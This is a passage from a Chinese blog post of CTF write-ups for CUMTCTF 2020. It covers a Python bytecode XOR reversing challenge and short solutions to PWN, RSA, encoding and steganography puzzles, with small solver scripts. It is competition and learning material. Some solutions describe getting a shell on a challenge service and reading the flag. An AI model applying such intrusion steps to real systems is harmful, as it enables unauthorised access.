class="number">2</span> (i)</span><br><span class="line">            <span class="number">96</span> STORE_FAST               <span class="number">3</span> (n)</span><br><span class="line"></span><br><span class="line"><span class="number">10</span>          <span class="number">98</span> LOAD_GLOBAL              <span class="number">3</span> (ord)</span><br><span class="line">           <span class="number">100</span> LOAD_FAST                <span class="number">3</span> (n)</span><br><span class="line">           <span class="number">102</span> CALL_FUNCTION            <span class="number">1</span></span><br><span class="line">           <span class="number">104</span> LOAD_CONST              <span class="number">24</span> (<span class="number">19</span>)</span><br><span class="line">           <span class="number">106</span> BINARY_XOR</span><br><span class="line">           <span class="number">108</span> LOAD_FAST                <span class="number">1</span> (cipher)</span><br><span class="line">           <span class="number">110</span> LOAD_FAST                <span class="number">2</span> (i)</span><br><span class="line">           <span class="number">112</span> BINARY_SUBSCR</span><br><span class="line">           <span class="number">114</span> COMPARE_OP               <span class="number">3</span> (!=)</span><br><span class="line">           <span class="number">116</span> POP_JUMP_IF_FALSE       <span class="number">90</span></span><br><span class="line"></span><br><span class="line"><span class="number">11</span>         <span class="number">118</span> LOAD_CONST              <span class="number">25</span> (<span class="literal">False</span>)</span><br><span class="line">           <span class="number">120</span> RETURN_VALUE</span><br><span class="line">           <span class="number">122</span> JUMP_ABSOLUTE           <span class="number">90</span></span><br><span class="line">       &gt;&gt;  <span class="number">124</span> POP_BLOCK</span><br><span class="line"></span><br><span class="line"><span class="number">12</span>     &gt;&gt;  <span class="number">126</span> LOAD_CONST              <span class="number">26</span> (<span class="literal">True</span>)</span><br><span class="line">           <span class="number">128</span> RETURN_VALUE</span><br><span class="line"></span><br><span class="line"><span class="number">14</span>     &gt;&gt;  <span class="number">130</span> LOAD_CONST              <span class="number">25</span> (<span class="literal">False</span>)</span><br><span class="line">           <span class="number">132</span> RETURN_VALUE</span><br><span class="line">           <span class="number">134</span> LOAD_CONST               <span class="number">0</span> (<span class="literal">None</span>)</span><br><span class="line">           <span class="number">136</span> RETURN_VALUE</span><br></pre></td></tr></table></figure>

<p>分析可知第5行声明一个列表，具体数值已给出，而后判断flag长度是否等于29，则取到了flag的长度为29.</p>
<p>在下一步，程序进行迭代，i,n in emuerate(flag)，并且ord(n) ^ 19 != cipher[i]，那么很明显了，将cipher的所有元素XOR回去转换为字符得到了FLAG。</p>
<p>附上Python代码：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">cipher=[<span class="number">80</span>,<span class="number">70</span>,<span class="number">94</span>,<span class="number">71</span>,<span class="number">80</span>,<span class="number">71</span>,<span class="number">85</span>,<span class="number">104</span>,<span class="number">86</span>,<span class="number">39</span>,<span class="number">64</span>,<span class="number">106</span>,<span class="number">76</span>,<span class="number">67</span>,<span class="number">106</span>,<span class="number">71</span>,<span class="number">123</span>,<span class="number">92</span>,<span class="number">125</span>,<span class="number">76</span>,<span class="number">37</span>,<span class="number">106</span>,<span class="number">103</span>,<span class="number">118</span>,<span class="number">80</span>,<span class="number">35</span>,<span class="number">119</span>,<span class="number">32</span>,<span class="number">110</span>]</span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> cipher:</span><br><span class="line">    print(chr(i ^ <span class="number">19</span>), end=<span class="string">&#x27;&#x27;</span>)</span><br></pre></td></tr></table></figure>

<p>得到Flag。</p>
<h2 id="PWN"><a href="#PWN" class="headerlink" title="PWN"></a>PWN</h2><h3 id="test-nc"><a href="#test-nc" class="headerlink" title="test_nc"></a>test_nc</h3><p>Kali下使用nc连接，选择得到学长QQ和密码，添加后得到Flag。</p>
<h3 id="babystack"><a href="#babystack" class="headerlink" title="babystack"></a>babystack</h3><p>拖入IDA，发现输入需要输入<strong>1_love_y0u</strong>。</p>
<p><img src="https://i.loli.net/2020/10/12/IjzCB6t3DbLSas1.png" alt="1601020478592"></p>
<p>输入后得到shell，ls获取当前目录文件，发现flag文件，cat得到。</p>
<p><img src="https://i.loli.net/2020/10/12/eiDBAdk6qT18Nva.png" alt="1601020653764"></p>
<h2 id="Crypto"><a href="#Crypto" class="headerlink" title="Crypto"></a>Crypto</h2><h3 id="幼儿园的密码题"><a href="#幼儿园的密码题" class="headerlink" title="幼儿园的密码题"></a>幼儿园的密码题</h3><p>根据提示，Google RSA，则先用16进制转10进制得到e、c、n。</p>
<p>然后自己写RSA Python脚本得到Flag。</p>
<h3 id="小学生的密码题"><a href="#小学生的密码题" class="headerlink" title="小学生的密码题"></a>小学生的密码题</h3><p>阅读Python代码，显然最后编码后的结果以0为分界线，由于print去除了最后末尾的0，补全后，编码结果应该为：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">21088410841088402108840420888888821088810888884210888888410888421088881088888820888841088842108820888881088884210888880888888408888888410</span><br></pre></td></tr></table></figure>

<p>如果逆向出发未免太烦了，考虑到对于每个字符的编码函数为：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">res &#x3D; &quot;&quot;</span><br><span class="line">if i &gt;&#x3D; 8:</span><br><span class="line">    res +&#x3D; int(i&#x2F;8)*&quot;8&quot;</span><br><span class="line">if i%8 &gt;&#x3D;4:</span><br><span class="line">    res +&#x3D; int(i%8&#x2F;4)*&quot;4&quot;</span><br><span class="line">if i%4 &gt;&#x3D;2:</span><br><span class="line">    res +&#x3D; int(i%4&#x2F;2)*&quot;2&quot;</span><br><span class="line">if i%2 &gt;&#x3D; 1:</span><br><span class="line">    res +&#x3D; int(i%2&#x2F;1)*&quot;1&quot;</span><br></pre></td></tr></table></figure>

<p>将其处理成函数，将0-127的字符全部进行编码，形成哈希映射。</p>
<p>对编码后的结果以0为分隔符分割，得到list，而后迭代获取对应则得到了flag。</p>
<h2 id="MISC"><a href="#MISC" class="headerlink" title="MISC"></a>MISC</h2><h3 id="连签到都算不上"><a href="#连签到都算不上" class="headerlink" title="连签到都算不上"></a>连签到都算不上</h3><p>将txt中的url打开，发现二维码，扫描后得到一串核心价值观字符串，进行核心价值观编码解码得到flag</p>
<h3 id="真·签到题"><a href="#真·签到题" class="headerlink" title="真·签到题"></a>真·签到题</h3><p>伪加密压缩包，加压拿到图片，隐写发现字符串</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">EWOVEVH&#123;U1ip_kp_uweeguuhw11a!&#125;</span><br></pre></td></tr></table></figure>

<p>长得很像Flag，考虑ROT，最终ROT24得到Flag。</p>
<h3 id="兔兔那么可爱"><a href="#兔兔那么可爱" class="headerlink" title="兔兔那么可爱"></a>兔兔那么可爱</h3><p>从文本文件中，按照斐波那契数列依次读取字符得到Flag(该题看了公告的Hint并且想到了某个数学家数兔子emmm)。</p>
<p>代码为：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">f = open(<span class="string">&#x27;flag&#x27;</span>, r)</span><br><span class="line">data = f.read()</span><br><span class="line"></span><br><span class="line">a, b = <span class="number">1</span>,<span class="number">2</span></span><br><span class="line"></span><br><span class="line">print(<span class="string">f&quot;<span class="subst">&#123;data[a<span class="number">-1</span>]&#125;</span><span class="subst">&#123;data[b<span class="number">-1</span>]&#125;</span>&quot;</span>, end=<span class="string">&#x27;&#x27;</span>)</span><br><span class="line"></span><br><span class="line"><span class="keyword">while</span> <span class="literal">True</span>:</span><br><span class="line">	t = b</span><br><span class="line">    b = a+b</span><br><span class="line">    a = t</span><br><span class="line">    print(<span class="string">f&quot;<span class="subst">&#123;data[b<span class="number">-1</span>]&#125;</span>&quot;</span>, end=<span class="string">&quot;&quot;</span>)</span><br><span class="line">    <span class="keyword">if</span> data[b<span class="number">-1</span>] == <span class="string">&#x27;&#125;&#x27;</span>:</span><br><span class="line">        <span class="keyword">break</span></span><br></pre></td></tr></table></figure>

<h3 id="别做题了听歌吧"><a href="#别做题了听歌吧" class="headerlink" title="别做题了听歌吧"></a>别做题了听歌吧</h3><p>MP3隐写，使用MP3Stego解密，根据Hint猜测密钥为cumt得到txt文件，将文本中的空格和缩进分别转为摩斯密码的**.<strong>和</strong>_**，解码得到Flag。</p>

    </div>

    
    
    

      <footer class="post-footer">
          <div class="post-tags">
              <a href="/bug-ddblog-punish/tags/CUMTCTF/" rel="tag"># CUMTCTF</a>
              <a href="/bug-ddblog-punish/tags/Writeup/" rel="tag"># Writeup</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/bug-ddblog-punish/p/2375111561/" rel="prev" title="Payload">
      <i class="fa fa-chevron-left"></i> Payload
    </a></div>
      <div class="post-nav-item">
    <a href="/bug-ddblog-punish/p/13758/" rel="next" title="CUMTCTF 2020 10">
      CUMTCTF 2020 10 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#Web"><span class="nav-number">1.</span> <span class="nav-text">Web</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#Web%E7%AD%BE%E5%88%B0"><span class="nav-number">1.1.</span> <span class="nav-text">Web签到</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Babysqli"><span class="nav-number">1.2.</span> <span class="nav-text">Babysqli</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Secret%EF%BC%9F"><span class="nav-number">1.3.</span> <span class="nav-text">Secret？</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Babysqli2"><span class="nav-number">1.4.</span> <span class="nav-text">Babysqli2</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E7%AE%80%E5%8D%95%E7%9A%84%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB"><span class="nav-number">1.5.</span> <span class="nav-text">简单的文件包含</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#RE"><span class="nav-number">2.</span> <span class="nav-text">RE</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E8%BF%9E%E4%B8%AA%E7%AD%BE%E5%88%B0%E5%88%86%E9%83%BD%E4%B8%8D%E7%BB%99%E4%BD%A0"><span class="nav-number">2.1.</span> <span class="nav-text">连个签到分都不给你</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Python%E9%A2%98%E7%A6%81%E6%AD%A2Py"><span class="nav-number">2.2.</span> <span class="nav-text">Python题禁止Py</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#PWN"><span class="nav-number">3.</span> <span class="nav-text">PWN</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#test-nc"><span class="nav-number">3.1.</span> <span class="nav-text">test_nc</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#babystack"><span class="nav-number">3.2.</span> <span class="nav-text">babystack</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Crypto"><span class="nav-number">4.</span> <span class="nav-text">Crypto</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%B9%BC%E5%84%BF%E5%9B%AD%E7%9A%84%E5%AF%86%E7%A0%81%E9%A2%98"><span class="nav-number">4.1.</span> <span class="nav-text">幼儿园的密码题</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%B0%8F%E5%AD%A6%E7%94%9F%E7%9A%84%E5%AF%86%E7%A0%81%E9%A2%98"><span class="nav-number">4.2.</span> <span class="nav-text">小学生的密码题</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#MISC"><span class="nav-number">5.</span> <span class="nav-text">MISC</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E8%BF%9E%E7%AD%BE%E5%88%B0%E9%83%BD%E7%AE%97%E4%B8%8D%E4%B8%8A"><span class="nav-number">5.1.</span> <span class="nav-text">连签到都算不上</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E7%9C%9F%C2%B7%E7%AD%BE%E5%88%B0%E9%A2%98"><span class="nav-number">5.2.</span> <span class="nav-text">真·签到题</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%85%94%E5%85%94%E9%82%A3%E4%B9%88%E5%8F%AF%E7%88%B1"><span class="nav-number">5.3.</span> <span class="nav-text">兔兔那么可爱</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%88%AB%E5%81%9A%E9%A2%98%E4%BA%86%E5%90%AC%E6%AD%8C%E5%90%A7"><span class="nav-number">5.4.</span> <span class="nav-text">别做题了听歌吧</span></a></li></ol></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">Zhou Hao</p>
  <div class="site-description" itemprop="description">bugDD的日常总结</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/bug-ddblog-punish/archives/">
        
          <span class="site-state-item-count">4</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-tags">
        <span class="site-state-item-count">3</span>
        <span class="site-state-item-name">标签</span>
      </div>
  </nav>
</div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2020</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Zhou Hao</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://mist.theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Mist</a> 强力驱动
  </div>

        








      </div>
    </footer>
  </div>

  
  <script src="/bug-ddblog-punish/lib/anime.min.js"></script>
  <script src="/bug-ddblog-punish/lib/velocity/velocity.min.js"></script>
  <script src="/bug-ddblog-punish/lib/velocity/velocity.ui.min.js"></script>

<script src="/bug-ddblog-punish/js/utils.js"></script>

<script src="/bug-ddblog-punish/js/motion.js"></script>


<script src="/bug-ddblog-punish/js/schemes/muse.js"></script>


<script src="/bug-ddblog-punish/js/next-boot.js"></script>




  




  
<script src="/bug-ddblog-punish/js/local-search.js"></script>













  

  

  

</body>

<script type="text/javascript" src="//cdn.bootcss.com/canvas-nest.js/1.0.0/canvas-nest.min.js"></script>

</html>
